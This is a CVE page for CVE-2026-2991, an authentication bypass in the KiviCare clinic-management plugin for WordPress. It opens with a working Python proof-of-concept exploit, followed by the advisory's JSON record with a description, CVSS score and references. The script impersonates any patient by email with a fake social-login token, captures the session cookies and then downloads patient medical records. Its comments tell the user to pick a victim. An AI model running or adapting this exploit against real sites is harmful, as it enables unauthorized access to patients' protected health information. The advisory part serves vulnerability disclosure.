CVE-2026-2991

import requests import json # CVE-2026-2991 PoC - KiviCare Authentication Bypass # Target: WordPress site with KiviCare plugin <= 4.1.2 target_url = "http://target-wordpress-site.com" # Replace with actual patient email you want to impersonate target_email = "[email protected]" arbitrary_token = "fake_social_access_token_12345" # Social login endpoint (typically in the API path) login_endpoint = f"{target_url}/wp-json/kivicare/v1/social-login" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } # Malicious payload exploiting the missing token validation payload = { "email": target_email, "access_token": arbitrary_token, "social_provider": "google" # or "facebook", "apple", etc. } print(f"[*] Attempting authentication bypass for: {target_email}") print(f"[*] Target: {login_endpoint}") try: response = requests.post(login_endpoint, json=payload, headers=headers, timeout=10) # Check for authentication cookies in response cookies = response.cookies.get_dict() print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Headers: {dict(response.headers)}") if cookies: print(f"[+] SUCCESS! Obtained authentication cookies: {cookies}") print("[+] Use these cookies to access patient data via API endpoints") # Example: Access patient records patient_data_endpoint = f"{target_url}/wp-json/kivicare/v1/patient-records" patient_response = requests.get(patient_data_endpoint, cookies=cookies) print(f"[*] Patient data response: {patient_response.status_code}") if patient_response.status_code == 200: print(f"[+] Patient data: {json.dumps(patient_response.json(), indent=2)}") else: print("[-] No cookies obtained, exploitation may have failed") print(f"[*] Full response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Note: Also check for admin cookie leakage in response headers # print(f"[*] Set-Cookie headers: {response.headers.get('Set-Cookie')}")

{"cve": {"id": "CVE-2026-2991", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:27.400", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 4.1.2. This is due to the `patientSocialLogin()` function not verifying the social provider access token before authenticating a user. This makes it possible for unauthenticated attackers to log in as any patient registered on the system by providing only their email address and an arbitrary value for the access token, bypassing all credential verification. The attacker gains access to sensitive medical records, appointments, prescriptions, and billing information (PII/PHI breach). Additionally, authentication cookies are set before the role check, meaning the auth cookies for non-patient users (including administrators) are also set in the HTTP response headers, even though a 403 response is returned."}, {"lang": "es", "value": "El plugin KiviCare – Clinic &amp; Patient Management System (EHR) para WordPress es vulnerable a la omisión de autenticación en todas las versiones hasta la 4.1.2, inclusive. Esto se debe a que la función 'patientSocialLogin()' no verifica el token de acceso del proveedor social antes de autenticar a un usuario. Esto hace posible que atacantes no autenticados inicien sesión como cualquier paciente registrado en el sistema proporcionando solo su dirección de correo electrónico y un valor arbitrario para el token de acceso, omitiendo toda verificación de credenciales. El atacante obtiene acceso a registros médicos sensibles, citas, recetas e información de facturación (violación de PII/PHI). Además, las cookies de autenticación se establecen antes de la verificación de rol, lo que significa que las cookies de autenticación para usuarios no pacientes (incluidos los administradores) también se establecen en los encabezados de respuesta HTTP, aunque se devuelve una respuesta 403."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/api/AuthController.php#L1852", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/api/AuthController.php#L284", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3467409/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8d22448b-aa8e-4775-b7c5-e7bae94a3f6d?source=cve", "source": "[email protected]"}]}}